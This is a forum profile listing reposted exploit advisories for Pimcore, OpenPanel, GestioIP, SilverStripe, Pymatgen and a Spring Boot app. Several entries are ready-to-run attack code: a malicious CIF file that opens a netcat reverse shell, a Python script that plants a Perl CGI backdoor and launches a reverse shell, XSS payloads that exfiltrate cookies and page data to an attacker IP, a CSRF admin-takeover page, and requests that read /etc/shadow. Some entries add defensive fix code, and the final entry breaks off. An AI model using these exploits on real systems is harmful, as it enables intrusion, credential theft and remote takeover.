
Everything posted by HireHackking
-
Pimcore 11.4.2 - Stored cross site scripting
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search Document
# Google Dork: N/A
# Date: 1/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
# CVE: CVE-2024-11954

---

### Description:

A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data Object Classification Store functionality. The vulnerability arises due to insufficient input sanitization, allowing an authenticated attacker with access to the classification store to inject malicious JavaScript code. This code is then executed in the context of other users' browsers when they view the affected data.

### Proof of Concept (PoC):

1. Log in to the Pimcore backend as a user with access to the Data Object Classification Store.
2. Navigate to the Classification Store and create or edit a key.
3. Inject the following payload into the key value:

```html
<script>alert('XSS')</script>
```

4. Save the file and view it in the frontend or backend. The JavaScript alert will execute, demonstrating the vulnerability.
-
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

```
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
```
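The request above reaches `/etc/shadow` because `path_param` and `filename` are joined onto the filesystem without being confined to the directory the file manager is meant to serve. The following is an added example by the editor, not OpenPanel's code, of how a file-viewing handler confines both parameters: the base directory, the `view_file` handler and the sample inputs are constructed for the example.

```python
import os

# Constructed example: the only directory the file manager may serve from
# (hypothetical path; the real OpenPanel layout is not known from the advisory).
BASE_DIR = "/srv/filemanager/home"


def resolve_within_base(base_dir, path_param, filename):
    """Map user-controlled (path_param, filename) onto a file under base_dir.

    Returns the canonical absolute path when it stays inside base_dir, otherwise
    None. Both inputs are untrusted: an absolute path_param such as "/etc" is
    re-rooted under the base instead of being honoured, and the file name may
    not carry directory components at all.
    """
    base = os.path.realpath(base_dir)

    # A bare file name only: no separators, no "." / ".." components.
    if (not filename or "/" in filename or "\\" in filename
            or filename in (".", "..")):
        return None

    # os.path.join("/base", "/etc") would discard "/base", so strip leading
    # separators from the directory parameter before joining.
    rel_dir = path_param.lstrip("/\\")
    candidate = os.path.realpath(os.path.join(base, rel_dir, filename))

    # realpath collapses ".." (and follows symlinks), so any traversal now shows
    # up as a path whose common prefix with the base is shorter than the base.
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:  # paths on different drives (Windows)
        return None
    return candidate


def view_file(path_param, filename):
    """Shape of a hardened /view_file handler: resolve first, read second."""
    target = resolve_within_base(BASE_DIR, path_param, filename)
    if target is None:
        return 403, "path outside the permitted directory"
    if not os.path.isfile(target):
        return 404, "no such file"
    with open(target, "rb") as fh:
        return 200, fh.read()


if __name__ == "__main__":
    for params in (("docs", "notes.txt"), ("/etc", "shadow"),
                   ("../../../etc", "shadow"), ("docs", "../shadow")):
        print(params, "->", resolve_within_base(BASE_DIR, *params))
```

The check is done on the canonicalised path rather than by searching the input for `..`, which is what catches encoded, doubled or symlink-based variants that string filters miss.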
-
OpenPanel 0.3.4 - OS Command Injection
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584

```
POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
```
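The `timezone` form value is evidently handed to a shell, so `;` terminates the intended command and starts another. As an added example by the editor (not OpenPanel's code), the block below shows the two controls that close this class of bug: a strict allowlist on the value's shape and an argv-list invocation with no shell involved. The `timedatectl` command line and the zone-name grammar are assumptions for the example.

```python
import re
import subprocess

# Shape of IANA zone names ("UTC", "Europe/Berlin", "America/Argentina/Buenos_Aires",
# "Etc/GMT+2"): letters, digits, "_", "+", "-" in up to three "/"-separated parts.
# Nothing else, so ";", spaces, ">" and quotes can never reach a command line.
_TZ_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_+\-]{0,31}(?:/[A-Za-z0-9_+\-]{1,31}){0,2}")


def validate_timezone(tz, known_zones=None):
    """Return tz unchanged if it is a syntactically valid zone name and, when an
    allowlist such as zoneinfo.available_timezones() is supplied, a known one."""
    if not isinstance(tz, str) or not _TZ_NAME.fullmatch(tz):
        raise ValueError("timezone name has invalid characters or shape")
    if known_zones is not None and tz not in known_zones:
        raise ValueError("unknown timezone")
    return tz


def build_set_timezone_argv(tz, known_zones=None):
    """argv list for the system call. The user value is exactly one argument and
    no shell parses it, so metacharacters cannot split or chain commands."""
    return ["timedatectl", "set-timezone", validate_timezone(tz, known_zones)]


def set_timezone(tz, runner=subprocess.run):
    # shell=False is subprocess's default; passing a list (not a string) keeps it so.
    return runner(build_set_timezone_argv(tz), check=True, capture_output=True, text=True)


def is_injection_attempt(form_value):
    """Detection rule for request logs: a value bound for a command that fails
    the allowlist (the ';cat ...' body above does) is worth an alert."""
    try:
        validate_timezone(form_value)
        return False
    except ValueError:
        return True
```

Even with the allowlist in place, the argv form is the control that matters: a future zone name containing an unexpected character would then at worst be rejected by `timedatectl`, not interpreted by `/bin/sh`.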
-
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must be enabled previously.

### Usage

To exploit this vulnerability, an attacker must host `payload.html` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute, making the attacker an administrator.

### File: payload.html

#### example: editing user named 'maxi'

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to our site</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; }
        .container { margin-top: 50px; }
        iframe { display: none; }
    </style>
</head>
<body>
    <div class="container">
        <h1>Thank you for visiting our site!</h1>
        <p>We are processing your request, please wait a moment...</p>
        <img src="https://placehold.co/150?text=Processing" alt="Processing...">
    </div>

    <!-- hidden iframe -->
    <iframe name="hiddenFrame"></iframe>

    <!-- The form that makes the POST to GestioIP Server -->
    <form action="http://localhost/gestioip/res/ip_mod_user.cgi" method="POST" target="hiddenFrame">
        <input type="hidden" name="name" value="maxi">
        <input type="hidden" name="group_id" value="1">
        <input type="hidden" name="email" value="maxi@test.com">
        <input type="hidden" name="phone" value="123">
        <input type="hidden" name="comment" value="">
        <input type="hidden" name="client_id" value="1">
        <input type="hidden" name="id" value="2">
        <input type="hidden" name="B2" value="">
    </form>

    <script>
        history.pushState('', '', '/');
        document.forms[0].submit();
    </script>
</body>
</html>
```
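The form above works because `ip_mod_user.cgi` accepts any POST that carries the admin's session cookie, with nothing in the request that an attacker's page could not supply. The block below is an added example by the editor, not GestioIP's code, of the two server-side checks that break this: a per-session synchronizer token compared in constant time, and a browser-origin check using the `Origin`/`Referer` and `Sec-Fetch-Site` headers. The session class, the handler and the site origin are constructed for the example.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Hypothetical origin of the GestioIP deployment (the form above posts to
# http://localhost/gestioip/...; the value is constructed for the example).
SITE_ORIGIN = "http://localhost"


class Session:
    """Server-side session; the CSRF token lives here, not in a cookie alone."""
    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)


def render_user_form(session, name):
    """Every state-changing form carries the session's token as a hidden field,
    which a page on another origin cannot read and therefore cannot replay."""
    return (f'<form method="POST" action="/gestioip/res/ip_mod_user.cgi">'
            f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
            f'<input type="text" name="name" value="{html.escape(name)}"></form>')


def request_origin_allowed(headers):
    """Fetch-metadata and Origin/Referer checks. Browsers set these headers on
    cross-site form posts, so an attacker-hosted page cannot make them match."""
    sfs = headers.get("Sec-Fetch-Site")
    if sfs is not None and sfs not in ("same-origin", "none"):
        return False
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer:
        p = urlsplit(referer)
        return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN
    return False  # neither header on a state-changing request: reject


def handle_mod_user(session, headers, form):
    """Gatekeeper for a state-changing endpoint (hypothetical handler)."""
    if not request_origin_allowed(headers):
        return 403, "cross-site request rejected"
    submitted = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(session.csrf_token.encode(), submitted):
        return 403, "missing or invalid CSRF token"
    return 200, f"user {form.get('name')} updated"
```

The two checks are independent: the token alone suffices against a forged cross-site POST, and the header check costs nothing and also covers forms that were missed when tokens were rolled out. Setting the session cookie with `SameSite=Lax` or `Strict` adds a third, browser-enforced layer.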
-
SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605

## Explanation:

When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.

## Requirements

1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.

## On the attacker server:

1. Create an html file with oembed information:

```
<html>
<head>
<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
</head>
<body>
<img src="media.jpg">
</body>
</html>
```

2. Create the json file with XSS payload:

```
{
  "title": "Title",
  "author_name": "author",
  "type": "video",
  "height": 113,
  "width": 200,
  "version": "1.0",
  "provider_name": "FakeSite",
  "thumbnail_height": 360,
  "thumbnail_width": 480,
  "thumbnail_url": "http://<attacker_server_ip>/media.jpg",
  "html": "<script>alert('hello world');</script>"
}
```

3. The media.jpg file can be any image.
4. Host these files on a publicly available website

## On the SilverStripe website:

1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.
-
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50861

### Description

The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.

### Prerequisites

1. Enable "DNS Key" Feature

First, ensure that "Dynamic DNS updates" is enabled in the global configuration:

Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes

This will enable the following menus:

Manage > DNS Keys
Manage > DNS Update User

2. Create a DNS Key Entry

To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, the "Admin" and "GestioIP Admin" groups have this permission. Also, you can configure this permission for any group under:

Manage > User Groups > Manage Sites and Categories

3. Enter payload.

Once the group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.

### Payloads

1 - Test basic XSS

```html
<script>alert("test")</script>
```

2 - Send data (cookies) to the attacker's server

```html
<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">
```

3 - Redirect the user to a malicious site

```html
<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">
```
-
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859

### Description

The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enable CSRF (Cross-Site Request Forgery) attacks. Proper input validation and output encoding are critical to prevent this vulnerability.

### Prerequisites

Enable (set to 'yes') the parameter: Manage > Manage GestioIP > ACL connection management

### Usage

Select: import/export > Import ACLs/ACL Connections
Select: "Connection List"
Select "report only"
Browse to select the file you want to upload.
Click 'upload'

### Payloads

#### 1) html file to upload

```html
<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
```

#### 2) js file to exfiltrate data

```javascript
var req1 = new XMLHttpRequest();
req1.open('GET', "http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();
response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);
```
-
Pymatgen 2024.1 - Remote Code Execution (RCE)
```python
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https://pymatgen.org
# Software Link : https://pypi.org/project/pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346

import os


# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")


# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")

    # Create the malicious CIF file
    create_malicious_cif(ip, port)

    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()


# Running the exploit
if __name__ == "__main__":
    exploit()
```
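The payload works because the `_space_group_magn.transform_BNS_Pp_abc` value, which should be nothing more than a linear expression in `a`, `b`, `c` plus an origin shift, is evaluated as Python. The block below is an added example by the editor, not pymatgen's parser, of what a safe parser for that field looks like: a character allowlist first, then an `ast` walk that accepts only names `a`/`b`/`c`, numbers, unary sign and `+ - * /`, and rejects every other node type. The return format (a 3x3 matrix of row coefficients and an origin vector, as `Fraction`s) is chosen for the example.

```python
import ast
import re
from fractions import Fraction

AXES = {"a": 0, "b": 1, "c": 2}
# Only these characters can appear in a legitimate transformation string.
_ALLOWED_CHARS = re.compile(r"[abc0-9+\-*/., ;]*")


class UnsafeExpression(ValueError):
    """Raised for anything that is not a plain linear expression in a, b, c."""


def _linear(node):
    """Walk an AST and return (coefficients[3], constant) as Fractions, accepting
    only names a/b/c, numbers, unary +/- and binary + - * /. Attribute access,
    subscripts, calls, comprehensions and everything else end up at the raise."""
    if isinstance(node, ast.Expression):
        return _linear(node.body)
    if isinstance(node, ast.Name) and node.id in AXES:
        coeffs = [Fraction(0)] * 3
        coeffs[AXES[node.id]] = Fraction(1)
        return coeffs, Fraction(0)
    if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
            and not isinstance(node.value, bool)):
        return [Fraction(0)] * 3, Fraction(node.value)
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
        coeffs, const = _linear(node.operand)
        sign = -1 if isinstance(node.op, ast.USub) else 1
        return [sign * x for x in coeffs], sign * const
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub, ast.Mult, ast.Div)):
        lc, lk = _linear(node.left)
        rc, rk = _linear(node.right)
        if isinstance(node.op, ast.Add):
            return [x + y for x, y in zip(lc, rc)], lk + rk
        if isinstance(node.op, ast.Sub):
            return [x - y for x, y in zip(lc, rc)], lk - rk
        left_scalar, right_scalar = not any(lc), not any(rc)
        if isinstance(node.op, ast.Mult) and left_scalar:
            return [lk * y for y in rc], lk * rk
        if isinstance(node.op, ast.Mult) and right_scalar:
            return [x * rk for x in lc], lk * rk
        if isinstance(node.op, ast.Div) and right_scalar and rk != 0:
            return [x / rk for x in lc], lk / rk
    raise UnsafeExpression(f"disallowed construct: {type(node).__name__}")


def parse_transformation_string(text):
    """'a,b,c;0,0,0' -> (3x3 matrix rows, origin vector), all entries Fractions.
    The origin part is optional; both parts go through the same restricted walker."""
    if not _ALLOWED_CHARS.fullmatch(text):
        raise UnsafeExpression("unexpected characters in transformation string")
    parts = text.split(";")
    if len(parts) > 2:
        raise UnsafeExpression("too many ';' separators")
    axis_exprs = parts[0].split(",")
    origin_exprs = parts[1].split(",") if len(parts) == 2 else ["0", "0", "0"]
    if len(axis_exprs) != 3 or len(origin_exprs) != 3:
        raise UnsafeExpression("expected three axis and three origin components")

    def evaluate(expr):
        try:
            tree = ast.parse(expr.strip(), mode="eval")
        except SyntaxError as exc:
            raise UnsafeExpression(f"not an expression: {expr!r}") from exc
        return _linear(tree)

    matrix = []
    for expr in axis_exprs:
        coeffs, const = evaluate(expr)
        if const != 0:
            raise UnsafeExpression("axis expressions must not carry a constant")
        matrix.append(coeffs)
    origin = []
    for expr in origin_exprs:
        coeffs, const = evaluate(expr)
        if any(coeffs):
            raise UnsafeExpression("origin components must be pure numbers")
        origin.append(const)
    return matrix, origin
```

The point of walking the AST instead of calling `eval` with a restricted namespace is that the grammar is enumerated positively: a node type the walker does not know is rejected, whereas a namespace filter has to anticipate every escape route from builtins and dunder attributes.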
-
Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)
```python
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302

# Steps to Reproduce:
# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).
# GET the file location: Send GET request /api/v1/customer/my-profile , grab the file location in response with the profile's link.
# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.

import requests
import argparse
import sys

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)


def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }
    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()
        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)
        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)


def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }
    try:
        # Open the file inside the try block so the handle is closed on every path.
        with open(file_path, "rb") as fh:
            files = {"file": fh}
            response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()
        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")
    args = parser.parse_args()

    # Authenticate
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)


if __name__ == "__main__":
    main()
```
-
GestioIP 3.5.7 - Remote Command Execution (RCE)
```python
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;
print "<html><body>";
print '<!-- CGI backdoor -->';
if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
    print $line . "<br/>";
}
print "</body></html>";
"""


# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response


def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)


def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet


if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)
```
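Both this GestioIP post and the Spring Boot profile-picture post above are the same defect seen from two sides: the server accepts whatever file name and content the client sends, and stores it where the web server will later execute it (here, the upload overwrites `upload.cgi` itself). The block below is an added example by the editor, not code from either project, of an upload handler that closes all three gaps at once: the content must match an image signature, the extension must be on an allowlist, the stored name is server-chosen, and the storage directory and serving headers are assumptions constructed for the example.

```python
import os
import secrets

# Allowed image types: extension -> magic-byte prefixes. Anything else (.jsp, .php,
# .html, .cgi, ...) is rejected regardless of what the client claims.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024
# Hypothetical storage location: outside every web and CGI document root, so
# nothing written here can be executed by the web server even if a check fails.
UPLOAD_DIR = "/var/lib/app/uploads"


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename, data):
    """Check an uploaded picture and return the server-chosen storage name."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    # Drop any directory components ("../../upload.cgi" becomes "upload.cgi").
    basename = os.path.basename(client_filename.replace("\\", "/"))
    if "." not in basename:
        raise UploadRejected("missing extension")
    ext = basename.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_MAGIC:
        raise UploadRejected(f"extension .{ext} is not an allowed image type")
    if not data.startswith(IMAGE_MAGIC[ext]):   # startswith accepts a tuple
        raise UploadRejected("content does not match the declared image type")
    # Never reuse the client's name: it can collide with or overwrite server
    # files. The only client influence left is the verified extension.
    return f"{secrets.token_hex(16)}.{ext}"


def serving_headers(storage_name):
    """Headers for handing the file back: fix the image type, forbid MIME
    sniffing, and sandbox the response so it can never run as a document."""
    ext = storage_name.rsplit(".", 1)[1]
    mime = "image/jpeg" if ext in ("jpg", "jpeg") else f"image/{ext}"
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'inline; filename="{storage_name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def store_upload(client_filename, data, upload_dir=UPLOAD_DIR):
    """Validate, then write under the server-chosen name in the non-executable directory."""
    name = validate_upload(client_filename, data)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(data)
    return name
```

A magic-byte check is deliberately paired with the extension check rather than replacing it: a file can be a valid GIF and a valid PHP script at the same time, so the extension (and therefore the handler the web server picks) must also be constrained, and the directory must not be one the server executes from.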
-
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857

### Description

